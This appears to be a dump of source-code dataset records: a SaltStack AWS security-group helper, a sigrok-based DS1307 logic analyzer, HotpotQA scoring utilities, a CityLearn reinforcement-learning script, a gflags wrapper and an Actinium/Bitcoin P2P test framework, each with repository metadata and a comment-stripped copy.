src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if revoked: log.info('Removed rule from security group {0} with id {1}.' .format(group.name, group.id)) return True else: msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to remove rule from security group.') return False def _get_conn(region, key, keyid, profile): if profile: if isinstance(profile, string_types): _profile = __salt__['config.option'](profile) elif isinstance(profile, dict): _profile = profile key = _profile.get('key', None) keyid = _profile.get('keyid', None) region = _profile.get('region', None) if not region and __salt__['config.option']('secgroup.region'): region = __salt__['config.option']('secgroup.region') if not region: region = 'us-east-1' if not key and __salt__['config.option']('secgroup.key'): key = __salt__['config.option']('secgroup.key') if not keyid and __salt__['config.option']('secgroup.keyid'): keyid = __salt__['config.option']('secgroup.keyid') try: conn = boto.ec2.connect_to_region(region, aws_access_key_id=keyid, aws_secret_access_key=key) except boto.exception.NoAuthHandlerFound: log.error('No authentication credentials found when attempting to' ' make ec2 connection for security groups.') return None return conn
true
true
f705e5539327770cb56ee6c0a5e5510efbddda11
1,677
py
Python
logic2_analyzers/DS1307/Hla.py
martonmiklos/sigrokdecoders_to_logic2_analyzers
9dd9b9a610c17e6ae525829c9112d11a80d016e7
[ "MIT" ]
5
2020-04-15T20:45:06.000Z
2020-05-31T02:45:21.000Z
logic2_analyzers/DS1307/Hla.py
martonmiklos/sigrokdecoders_to_logic2_analyzers
9dd9b9a610c17e6ae525829c9112d11a80d016e7
[ "MIT" ]
1
2020-07-15T09:23:05.000Z
2020-07-15T10:04:48.000Z
logic2_analyzers/DS1307/Hla.py
martonmiklos/sigrokdecoders_to_logic2_analyzers
9dd9b9a610c17e6ae525829c9112d11a80d016e7
[ "MIT" ]
1
2020-04-20T18:49:36.000Z
2020-04-20T18:49:36.000Z
import sys sys.path.insert(0, "../") # our fake sigrokdecode lives one dir upper from pd import Decoder class DS1307(): def __init__(self): self.sigrokDecoder = Decoder() def get_capabilities(self): settings = {} for option in self.sigrokDecoder.options : settingType = '' choices = [] if ("values" not in option) : # TODO sigrok docs does not mention that default is mandatory if (isinstance(option['default'], str)) : settingType = 'string' elif (isinstance(option['default'], int) or isinstance(option['default'], float)) : settingType = 'number' else : print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default']) settings[option["desc"]] = { 'type': settingType } if ("values" in option) : settings[option["desc"]]['choices'] = option["values"] return { 'settings': settings } def set_settings(self, settings): # TODO handle the settings # convert sigrok's # annotations = ( # ('warning', 'Warning'), # .... # # format annotations to Logic's format self.sigrokDecoder.reset() resultTypes = {} for annotation in self.sigrokDecoder.annotations : resultTypes[annotation[0]] = annotation[1] + "{{data.data}}" return { "result_types": resultTypes } def decode(self, data): self.sigrokDecoder.processI2C(data) if (not self.packet == {}) : ret = self.generate_logic_result() self.packet = {} return ret
29.421053
137
0.57901
import sys sys.path.insert(0, "../") from pd import Decoder class DS1307(): def __init__(self): self.sigrokDecoder = Decoder() def get_capabilities(self): settings = {} for option in self.sigrokDecoder.options : settingType = '' choices = [] if ("values" not in option) : if (isinstance(option['default'], str)) : settingType = 'string' elif (isinstance(option['default'], int) or isinstance(option['default'], float)) : settingType = 'number' else : print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default']) settings[option["desc"]] = { 'type': settingType } if ("values" in option) : settings[option["desc"]]['choices'] = option["values"] return { 'settings': settings } def set_settings(self, settings): # TODO handle the settings # convert sigrok's self.sigrokDecoder.reset() resultTypes = {} for annotation in self.sigrokDecoder.annotations : resultTypes[annotation[0]] = annotation[1] + "{{data.data}}" return { "result_types": resultTypes } def decode(self, data): self.sigrokDecoder.processI2C(data) if (not self.packet == {}) : ret = self.generate_logic_result() self.packet = {} return ret
true
true
f705e56a5a72c63a6b880ab3f1397c0082a8229a
4,774
py
Python
hotpotqa_utils_joint.py
Captainr22/SAE
f3e370604978a273eb1e1ffdbd342dee3de431c9
[ "MIT" ]
38
2020-01-23T00:46:06.000Z
2022-03-13T13:10:19.000Z
hotpotqa_utils_joint.py
Captainr22/SAE
f3e370604978a273eb1e1ffdbd342dee3de431c9
[ "MIT" ]
7
2020-02-02T02:05:32.000Z
2022-03-06T04:37:06.000Z
hotpotqa_utils_joint.py
Captainr22/SAE
f3e370604978a273eb1e1ffdbd342dee3de431c9
[ "MIT" ]
9
2020-02-12T08:35:23.000Z
2022-02-19T07:29:26.000Z
import torch import numpy as np import json, sys, re, string import collections from collections import Counter from collections import OrderedDict def get_sp_pred(pred_sp_idx, data): """get the prediction of supporting facts in original format Arguments: pred_sp_idx {[type]} -- [description] data {[type]} -- [description] """ pred = [] for p in pred_sp_idx: if p < len(data): pred.append([data[p].doc_title[0], data[p].sent_id]) return pred def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length): """get predictions for each sample in the batch Arguments: batch_index {[type]} -- [description] batch_logits {[type]} -- 0: supporting facts logits, 1: answer span logits, 2: answer type logits 3: gold doc logits batch_size {[type]} -- [description] predict_file {[type]} -- [description] """ sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy() ans_type_logits_np = batch_logits[1].detach().cpu().numpy() batch_index = batch_index.numpy().tolist() sp_pred, span_pred, ans_type_pred = [], [], [] for idx, data in enumerate(batch_index): # supporting facts prediction pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ] print(pred_sp_idx) if len(pred_sp_idx) != 0: sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data])) else: sp_pred.append([]) # answer type prediction, for debug purpose ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:])) # answer span prediction if ans_type_pred[-1] == 0: span_pred.append("no") elif ans_type_pred[-1] == 1: span_pred.append("yes") else: span_pred.append("") return sp_pred, span_pred, ans_type_pred # def evaluate(eval_file, answer_dict): # f1 = exact_match = total = 0 # for key, value in enumerate(answer_dict): # total += 1 # ground_truths = eval_file[key]["answer"] # prediction = value # cur_EM = exact_match_score(prediction, ground_truths) # cur_f1, _, _ = f1_score(prediction, ground_truths) # exact_match += cur_EM # f1 += cur_f1 # exact_match = 100.0 * exact_match / total # f1 = 100.0 * f1 / total # return {'exact_match': exact_match, 'f1': f1} def normalize_answer(s): def remove_articles(text): return re.sub(r'\b(a|an|the)\b', ' ', text) def white_space_fix(text): return ' '.join(text.split()) def remove_punc(text): exclude = set(string.punctuation) return ''.join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_articles(remove_punc(lower(s)))) def f1_score(prediction, ground_truth): normalized_prediction = normalize_answer(prediction) normalized_ground_truth = normalize_answer(ground_truth) ZERO_METRIC = (0, 0, 0) if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC prediction_tokens = normalized_prediction.split() ground_truth_tokens = normalized_ground_truth.split() common = Counter(prediction_tokens) & Counter(ground_truth_tokens) num_same = sum(common.values()) if num_same == 0: return ZERO_METRIC precision = 1.0 * num_same / len(prediction_tokens) recall = 1.0 * num_same / len(ground_truth_tokens) f1 = (2 * precision * recall) / (precision + recall) return f1, precision, recall def exact_match_score(prediction, ground_truth): return (normalize_answer(prediction) == normalize_answer(ground_truth)) def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir): """write predictions to json file Arguments: sp_preds {[type]} -- [description] answer_preds {[type]} -- [description] orig_data {[type]} -- [description] predict_file {[type]} -- [description] output_dir {[type]} -- [description] """ if len(answer_preds) == 0: answer_preds = ["place_holder"] * len(orig_data) all_pred = {} all_pred['answer'] = OrderedDict() all_pred['sp'] = OrderedDict() for idx, data in enumerate(orig_data): all_pred['answer'][data['_id']] = answer_preds[idx] all_pred['sp'][data['_id']] = sp_preds[idx] with open(output_dir, 'w') as fid: json.dump(all_pred, fid)
32.47619
124
0.646418
import torch import numpy as np import json, sys, re, string import collections from collections import Counter from collections import OrderedDict def get_sp_pred(pred_sp_idx, data): pred = [] for p in pred_sp_idx: if p < len(data): pred.append([data[p].doc_title[0], data[p].sent_id]) return pred def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length): sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy() ans_type_logits_np = batch_logits[1].detach().cpu().numpy() batch_index = batch_index.numpy().tolist() sp_pred, span_pred, ans_type_pred = [], [], [] for idx, data in enumerate(batch_index): pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ] print(pred_sp_idx) if len(pred_sp_idx) != 0: sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data])) else: sp_pred.append([]) ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:])) if ans_type_pred[-1] == 0: span_pred.append("no") elif ans_type_pred[-1] == 1: span_pred.append("yes") else: span_pred.append("") return sp_pred, span_pred, ans_type_pred def normalize_answer(s): def remove_articles(text): return re.sub(r'\b(a|an|the)\b', ' ', text) def white_space_fix(text): return ' '.join(text.split()) def remove_punc(text): exclude = set(string.punctuation) return ''.join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_articles(remove_punc(lower(s)))) def f1_score(prediction, ground_truth): normalized_prediction = normalize_answer(prediction) normalized_ground_truth = normalize_answer(ground_truth) ZERO_METRIC = (0, 0, 0) if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC prediction_tokens = normalized_prediction.split() ground_truth_tokens = normalized_ground_truth.split() common = Counter(prediction_tokens) & Counter(ground_truth_tokens) num_same = sum(common.values()) if num_same == 0: return ZERO_METRIC precision = 1.0 * num_same / len(prediction_tokens) recall = 1.0 * num_same / len(ground_truth_tokens) f1 = (2 * precision * recall) / (precision + recall) return f1, precision, recall def exact_match_score(prediction, ground_truth): return (normalize_answer(prediction) == normalize_answer(ground_truth)) def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir): if len(answer_preds) == 0: answer_preds = ["place_holder"] * len(orig_data) all_pred = {} all_pred['answer'] = OrderedDict() all_pred['sp'] = OrderedDict() for idx, data in enumerate(orig_data): all_pred['answer'][data['_id']] = answer_preds[idx] all_pred['sp'][data['_id']] = sp_preds[idx] with open(output_dir, 'w') as fid: json.dump(all_pred, fid)
true
true
f705e584e7382dd36ff080ed8c2d1c45f243aa82
255
py
Python
task/learn-python/pyramid.py
jiangdapeng/netease
032c8f7c60b8afb98bf9674cf3617f614c200a92
[ "MIT" ]
null
null
null
task/learn-python/pyramid.py
jiangdapeng/netease
032c8f7c60b8afb98bf9674cf3617f614c200a92
[ "MIT" ]
null
null
null
task/learn-python/pyramid.py
jiangdapeng/netease
032c8f7c60b8afb98bf9674cf3617f614c200a92
[ "MIT" ]
null
null
null
#!/usr/bin/python #-*-coding=utf-8-*- def pyramid(n): most = 2*n - 1 for i in range(1,n+1): star = 2*i - 1 space = n - i print(" "*space + "*"*star) def test(): pyramid(3) pyramid(4) pyramid(5) if __name__ == "__main__": test()
14.166667
31
0.529412
def pyramid(n): most = 2*n - 1 for i in range(1,n+1): star = 2*i - 1 space = n - i print(" "*space + "*"*star) def test(): pyramid(3) pyramid(4) pyramid(5) if __name__ == "__main__": test()
true
true
f705e60ad2bc78f130ddc2bedec6d3d2060f4f8b
3,309
py
Python
tests/rl_main.py
constancecrozier/CityLearn
c92f981771d29181cffce448a31d8f367a668175
[ "MIT" ]
null
null
null
tests/rl_main.py
constancecrozier/CityLearn
c92f981771d29181cffce448a31d8f367a668175
[ "MIT" ]
null
null
null
tests/rl_main.py
constancecrozier/CityLearn
c92f981771d29181cffce448a31d8f367a668175
[ "MIT" ]
null
null
null
# Run this again after editing submodules so Colab uses the updated versions from citylearn import CityLearn from citylearn import GridLearn import matplotlib.pyplot as plt from pathlib import Path from citylearn import RL_Agents_Coord, Cluster_Agents import numpy as np import csv import time import re import pandas as pd import torch from joblib import dump, load # Load environment climate_zone = 1 data_path = Path("citylearn/data/Climate_Zone_"+str(climate_zone)) building_attributes = data_path / 'building_attributes.json' weather_file = data_path / 'weather_data.csv' solar_profile = data_path / 'solar_generation_1kW.csv' building_state_actions = 'citylearn/buildings_state_action_space.json' building_id = ["Building_1","Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"] objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption','quadratic','voltage_dev'] ep_period = 8760 print("Initializing the grid...") # Contain the lower and upper bounds of the states and actions, to be provided to the agent to normalize the variables between 0 and 1. # Can be obtained using observations_spaces[i].low or .high env = GridLearn(data_path, building_attributes, weather_file, solar_profile, building_id, 1, buildings_states_actions = building_state_actions, simulation_period = (0,ep_period), cost_function = objective_function, verbose=1, n_buildings_per_bus=1) # Hyperparameters batch_size = 254 bs = batch_size tau = 0.005 gamma = 0.99 lr = 0.0003 hid = [batch_size,batch_size] n_episodes = 3 n_training_eps = n_episodes - 1 if not (batch_size < ep_period * n_training_eps): print("will produce a key error because the neural nets won't be initialized yet") print("Initializing the agents...") # Instantiating the control agent(s) agents = RL_Agents_Coord(env, list(env.buildings.keys()), discount = gamma, batch_size = bs, replay_buffer_capacity = 1e5, regression_buffer_capacity = 12*ep_period, tau=tau, lr=lr, hidden_dim=hid, start_training=(ep_period+1)*(n_episodes-1), exploration_period = (ep_period+1)*(n_episodes)+1, start_regression=(ep_period+1), information_sharing = True, pca_compression = .95, action_scaling_coef=0.5, reward_scaling = 5., update_per_step = 1, iterations_as = 2) print("Starting the experiment...") # The number of episodes can be replaces by a stopping criterion (i.e. convergence of the average reward) start = time.time() for e in range(n_episodes): is_evaluating = (e > n_training_eps) # Evaluate deterministic policy after 7 epochs rewards = [] state = env.reset() done = False j = 0 print("is_deterministic", is_evaluating) action, coordination_vars = agents.select_action(state, deterministic=is_evaluating) # print(action) while not done: next_state, reward, done, _ = env.step(action) action_next, coordination_vars_next = agents.select_action(next_state, deterministic=is_evaluating) agents.add_to_buffer(state, action, reward, next_state, done, coordination_vars, coordination_vars_next) state = next_state coordination_vars = coordination_vars_next action = action_next print('Loss -',env.cost(), 'Simulation time (min) -',(time.time()-start)/60.0)
44.716216
463
0.767604
from citylearn import CityLearn from citylearn import GridLearn import matplotlib.pyplot as plt from pathlib import Path from citylearn import RL_Agents_Coord, Cluster_Agents import numpy as np import csv import time import re import pandas as pd import torch from joblib import dump, load climate_zone = 1 data_path = Path("citylearn/data/Climate_Zone_"+str(climate_zone)) building_attributes = data_path / 'building_attributes.json' weather_file = data_path / 'weather_data.csv' solar_profile = data_path / 'solar_generation_1kW.csv' building_state_actions = 'citylearn/buildings_state_action_space.json' building_id = ["Building_1","Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"] objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption','quadratic','voltage_dev'] ep_period = 8760 print("Initializing the grid...") env = GridLearn(data_path, building_attributes, weather_file, solar_profile, building_id, 1, buildings_states_actions = building_state_actions, simulation_period = (0,ep_period), cost_function = objective_function, verbose=1, n_buildings_per_bus=1) batch_size = 254 bs = batch_size tau = 0.005 gamma = 0.99 lr = 0.0003 hid = [batch_size,batch_size] n_episodes = 3 n_training_eps = n_episodes - 1 if not (batch_size < ep_period * n_training_eps): print("will produce a key error because the neural nets won't be initialized yet") print("Initializing the agents...") # Instantiating the control agent(s) agents = RL_Agents_Coord(env, list(env.buildings.keys()), discount = gamma, batch_size = bs, replay_buffer_capacity = 1e5, regression_buffer_capacity = 12*ep_period, tau=tau, lr=lr, hidden_dim=hid, start_training=(ep_period+1)*(n_episodes-1), exploration_period = (ep_period+1)*(n_episodes)+1, start_regression=(ep_period+1), information_sharing = True, pca_compression = .95, action_scaling_coef=0.5, reward_scaling = 5., update_per_step = 1, iterations_as = 2) print("Starting the experiment...") # The number of episodes can be replaces by a stopping criterion (i.e. convergence of the average reward) start = time.time() for e in range(n_episodes): is_evaluating = (e > n_training_eps) # Evaluate deterministic policy after 7 epochs rewards = [] state = env.reset() done = False j = 0 print("is_deterministic", is_evaluating) action, coordination_vars = agents.select_action(state, deterministic=is_evaluating) # print(action) while not done: next_state, reward, done, _ = env.step(action) action_next, coordination_vars_next = agents.select_action(next_state, deterministic=is_evaluating) agents.add_to_buffer(state, action, reward, next_state, done, coordination_vars, coordination_vars_next) state = next_state coordination_vars = coordination_vars_next action = action_next print('Loss -',env.cost(), 'Simulation time (min) -',(time.time()-start)/60.0)
true
true
f705e769068d5766e5f862e7c150a7e010365ee9
675
py
Python
base/flags.py
d2lam/common
3db9ac8fc46c2159568180ca1188dfa3aeacd7cb
[ "BSD-3-Clause" ]
1
2016-09-29T14:17:27.000Z
2016-09-29T14:17:27.000Z
base/flags.py
d2lam/common
3db9ac8fc46c2159568180ca1188dfa3aeacd7cb
[ "BSD-3-Clause" ]
null
null
null
base/flags.py
d2lam/common
3db9ac8fc46c2159568180ca1188dfa3aeacd7cb
[ "BSD-3-Clause" ]
null
null
null
# Copyright 2013 # Author: Christopher Van Arsdale # # See common/third_party/google/gflags_python/gflags for info # # Examlpe: # import common.base.flags # import sys # # FLAGS = flags.FLAGS # flags.d.DEFINE_bool('my_bool', false, 'My description') # # def main(argv): # flags.Parse(argv) # ... use FLAGS.my_bool as boolean ... # # if __name__ == "__main__": # main(sys.argv) import common.third_party.google.gflags_python.gflags as gflags # Interface simplification d = gflags FLAGS = gflags.FLAGS def Parse(argv): try: argv = FLAGS(argv) except gflags.FlagsError, e: print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS) sys.exit(1)
21.09375
63
0.678519
import common.third_party.google.gflags_python.gflags as gflags d = gflags FLAGS = gflags.FLAGS def Parse(argv): try: argv = FLAGS(argv) except gflags.FlagsError, e: print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS) sys.exit(1)
false
true
f705e793f8a0fdc1881cae42982b88bb9cb07532
16,656
py
Python
test/functional/test_framework/mininode.py
Actinium-project/acmcore-actinium-next
4b2b56d034d19ba41907c30b91948ed4bc8322ad
[ "MIT" ]
null
null
null
test/functional/test_framework/mininode.py
Actinium-project/acmcore-actinium-next
4b2b56d034d19ba41907c30b91948ed4bc8322ad
[ "MIT" ]
null
null
null
test/functional/test_framework/mininode.py
Actinium-project/acmcore-actinium-next
4b2b56d034d19ba41907c30b91948ed4bc8322ad
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2010 ArtForz -- public domain half-a-node # Copyright (c) 2012 Jeff Garzik # Copyright (c) 2010-2017 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Bitcoin P2P network half-a-node. This python code was modified from ArtForz' public domain half-a-node, as found in the mini-node branch of http://github.com/jgarzik/pynode. P2PConnection: A low-level connection object to a node's P2P interface P2PInterface: A high-level interface object for communicating to a node over P2P""" import asyncore from collections import defaultdict from io import BytesIO import logging import socket import struct import sys import threading from test_framework.messages import * from test_framework.util import wait_until logger = logging.getLogger("TestFramework.mininode") MESSAGEMAP = { b"addr": msg_addr, b"block": msg_block, b"blocktxn": msg_blocktxn, b"cmpctblock": msg_cmpctblock, b"feefilter": msg_feefilter, b"getaddr": msg_getaddr, b"getblocks": msg_getblocks, b"getblocktxn": msg_getblocktxn, b"getdata": msg_getdata, b"getheaders": msg_getheaders, b"headers": msg_headers, b"inv": msg_inv, b"mempool": msg_mempool, b"ping": msg_ping, b"pong": msg_pong, b"reject": msg_reject, b"sendcmpct": msg_sendcmpct, b"sendheaders": msg_sendheaders, b"tx": msg_tx, b"verack": msg_verack, b"version": msg_version, } MAGIC_BYTES = { "mainnet": b"\xfb\xc0\xb6\xdb", # mainnet "testnet4": b"\xfd\xd2\xc8\xf1", # testnet3 "regtest": b"\xfa\xbf\xb5\xda", # regtest } class P2PConnection(asyncore.dispatcher): """A low-level connection object to a node's P2P interface. This class is responsible for: - opening and closing the TCP connection to the node - reading bytes from and writing bytes to the socket - deserializing and serializing the P2P message header - logging messages as they are sent and received This class contains no logic for handing the P2P message payloads. It must be sub-classed and the on_message() callback overridden.""" def __init__(self): # All P2PConnections must be created before starting the NetworkThread. # assert that the network thread is not running. assert not network_thread_running() super().__init__(map=mininode_socket_map) def peer_connect(self, dstaddr, dstport, net="regtest"): self.dstaddr = dstaddr self.dstport = dstport self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) self.sendbuf = b"" self.recvbuf = b"" self.state = "connecting" self.network = net self.disconnect = False logger.info('Connecting to Actinium Node: %s:%d' % (self.dstaddr, self.dstport)) try: self.connect((dstaddr, dstport)) except: self.handle_close() def peer_disconnect(self): # Connection could have already been closed by other end. if self.state == "connected": self.disconnect_node() # Connection and disconnection methods def handle_connect(self): """asyncore callback when a connection is opened.""" if self.state != "connected": logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport)) self.state = "connected" self.on_open() def handle_close(self): """asyncore callback when a connection is closed.""" logger.debug("Closing connection to: %s:%d" % (self.dstaddr, self.dstport)) self.state = "closed" self.recvbuf = b"" self.sendbuf = b"" try: self.close() except: pass self.on_close() def disconnect_node(self): """Disconnect the p2p connection. Called by the test logic thread. Causes the p2p connection to be disconnected on the next iteration of the asyncore loop.""" self.disconnect = True # Socket read methods def handle_read(self): """asyncore callback when data is read from the socket.""" t = self.recv(8192) if len(t) > 0: self.recvbuf += t self._on_data() def _on_data(self): """Try to read P2P messages from the recv buffer. This method reads data from the buffer in a loop. It deserializes, parses and verifies the P2P header, then passes the P2P payload to the on_message callback for processing.""" try: while True: if len(self.recvbuf) < 4: return if self.recvbuf[:4] != MAGIC_BYTES[self.network]: raise ValueError("got garbage %s" % repr(self.recvbuf)) if len(self.recvbuf) < 4 + 12 + 4 + 4: return command = self.recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = self.recvbuf[4+12+4:4+12+4+4] if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen: return msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen] th = sha256(msg) h = sha256(th) if checksum != h[:4]: raise ValueError("got bad checksum " + repr(self.recvbuf)) self.recvbuf = self.recvbuf[4+12+4+4+msglen:] if command not in MESSAGEMAP: raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg))) f = BytesIO(msg) t = MESSAGEMAP[command]() t.deserialize(f) self._log_message("receive", t) self.on_message(t) except Exception as e: logger.exception('Error reading message:', repr(e)) raise def on_message(self, message): """Callback for processing a P2P payload. Must be overridden by derived class.""" raise NotImplementedError # Socket write methods def writable(self): """asyncore method to determine whether the handle_write() callback should be called on the next loop.""" with mininode_lock: pre_connection = self.state == "connecting" length = len(self.sendbuf) return (length > 0 or pre_connection) def handle_write(self): """asyncore callback when data should be written to the socket.""" with mininode_lock: # asyncore does not expose socket connection, only the first read/write # event, thus we must check connection manually here to know when we # actually connect if self.state == "connecting": self.handle_connect() if not self.writable(): return try: sent = self.send(self.sendbuf) except: self.handle_close() return self.sendbuf = self.sendbuf[sent:] def send_message(self, message, pushbuf=False): """Send a P2P message over the socket. This method takes a P2P payload, builds the P2P header and adds the message to the send buffer to be sent over the socket.""" if self.state != "connected" and not pushbuf: raise IOError('Not connected, no pushbuf') self._log_message("send", message) command = message.command data = message.serialize() tmsg = MAGIC_BYTES[self.network] tmsg += command tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack("<I", len(data)) th = sha256(data) h = sha256(th) tmsg += h[:4] tmsg += data with mininode_lock: if (len(self.sendbuf) == 0 and not pushbuf): try: sent = self.send(tmsg) self.sendbuf = tmsg[sent:] except BlockingIOError: self.sendbuf = tmsg else: self.sendbuf += tmsg # Class utility methods def _log_message(self, direction, msg): """Logs a message being sent or received over the connection.""" if direction == "send": log_message = "Send message to " elif direction == "receive": log_message = "Received message from " log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500]) if len(log_message) > 500: log_message += "... (msg truncated)" logger.debug(log_message) class P2PInterface(P2PConnection): """A high-level P2P interface class for communicating with a Bitcoin node. This class provides high-level callbacks for processing P2P message payloads, as well as convenience methods for interacting with the node over P2P. Individual testcases should subclass this and override the on_* methods if they want to alter message handling behaviour.""" def __init__(self): super().__init__() # Track number of messages of each type received and the most recent # message of each type self.message_count = defaultdict(int) self.last_message = {} # A count of the number of ping messages we've sent to the node self.ping_counter = 1 # The network services received from the peer self.nServices = 0 def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs): super().peer_connect(*args, **kwargs) if send_version: # Send a version msg vt = msg_version() vt.nServices = services vt.addrTo.ip = self.dstaddr vt.addrTo.port = self.dstport vt.addrFrom.ip = "0.0.0.0" vt.addrFrom.port = 0 self.send_message(vt, True) # Message receiving methods def on_message(self, message): """Receive message and dispatch message to appropriate callback. We keep a count of how many of each message type has been received and the most recent message of each type.""" with mininode_lock: try: command = message.command.decode('ascii') self.message_count[command] += 1 self.last_message[command] = message getattr(self, 'on_' + command)(message) except: print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0])) raise # Callback methods. Can be overridden by subclasses in individual test # cases to provide custom message handling behaviour. def on_open(self): pass def on_close(self): pass def on_addr(self, message): pass def on_block(self, message): pass def on_blocktxn(self, message): pass def on_cmpctblock(self, message): pass def on_feefilter(self, message): pass def on_getaddr(self, message): pass def on_getblocks(self, message): pass def on_getblocktxn(self, message): pass def on_getdata(self, message): pass def on_getheaders(self, message): pass def on_headers(self, message): pass def on_mempool(self, message): pass def on_pong(self, message): pass def on_reject(self, message): pass def on_sendcmpct(self, message): pass def on_sendheaders(self, message): pass def on_tx(self, message): pass def on_inv(self, message): want = msg_getdata() for i in message.inv: if i.type != 0: want.inv.append(i) if len(want.inv): self.send_message(want) def on_ping(self, message): self.send_message(msg_pong(message.nonce)) def on_verack(self, message): self.verack_received = True def on_version(self, message): assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED) self.send_message(msg_verack()) self.nServices = message.nServices # Connection helper methods def wait_for_disconnect(self, timeout=60): test_function = lambda: self.state != "connected" wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message receiving helper methods def wait_for_block(self, blockhash, timeout=60): test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getdata(self, timeout=60): test_function = lambda: self.last_message.get("getdata") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getheaders(self, timeout=60): test_function = lambda: self.last_message.get("getheaders") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_inv(self, expected_inv, timeout=60): """Waits for an INV message and checks that the first inv object in the message was as expected.""" if len(expected_inv) > 1: raise NotImplementedError("wait_for_inv() will only verify the first inv object") test_function = lambda: self.last_message.get("inv") and \ self.last_message["inv"].inv[0].type == expected_inv[0].type and \ self.last_message["inv"].inv[0].hash == expected_inv[0].hash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_verack(self, timeout=60): test_function = lambda: self.message_count["verack"] wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message sending helper functions def send_and_ping(self, message): self.send_message(message) self.sync_with_ping() # Sync up with the node def sync_with_ping(self, timeout=60): self.send_message(msg_ping(nonce=self.ping_counter)) test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter wait_until(test_function, timeout=timeout, lock=mininode_lock) self.ping_counter += 1 # Keep our own socket map for asyncore, so that we can track disconnects # ourselves (to workaround an issue with closing an asyncore socket when # using select) mininode_socket_map = dict() # One lock for synchronizing all data access between the networking thread (see # NetworkThread below) and the thread running the test logic. For simplicity, # P2PConnection acquires this lock whenever delivering a message to a P2PInterface, # and whenever adding anything to the send buffer (in send_message()). This # lock should be acquired in the thread running the test logic to synchronize # access to any data shared with the P2PInterface or P2PConnection. mininode_lock = threading.RLock() class NetworkThread(threading.Thread): def __init__(self): super().__init__(name="NetworkThread") def run(self): while mininode_socket_map: # We check for whether to disconnect outside of the asyncore # loop to workaround the behavior of asyncore when using # select disconnected = [] for fd, obj in mininode_socket_map.items(): if obj.disconnect: disconnected.append(obj) [obj.handle_close() for obj in disconnected] asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1) logger.debug("Network thread closing") def network_thread_start(): """Start the network thread.""" # Only one network thread may run at a time assert not network_thread_running() NetworkThread().start() def network_thread_running(): """Return whether the network thread is running.""" return any([thread.name == "NetworkThread" for thread in threading.enumerate()]) def network_thread_join(timeout=10): """Wait timeout seconds for the network thread to terminate. Throw if the network thread doesn't terminate in timeout seconds.""" network_threads = [thread for thread in threading.enumerate() if thread.name == "NetworkThread"] assert len(network_threads) <= 1 for thread in network_threads: thread.join(timeout) assert not thread.is_alive()
37.598194
182
0.635447
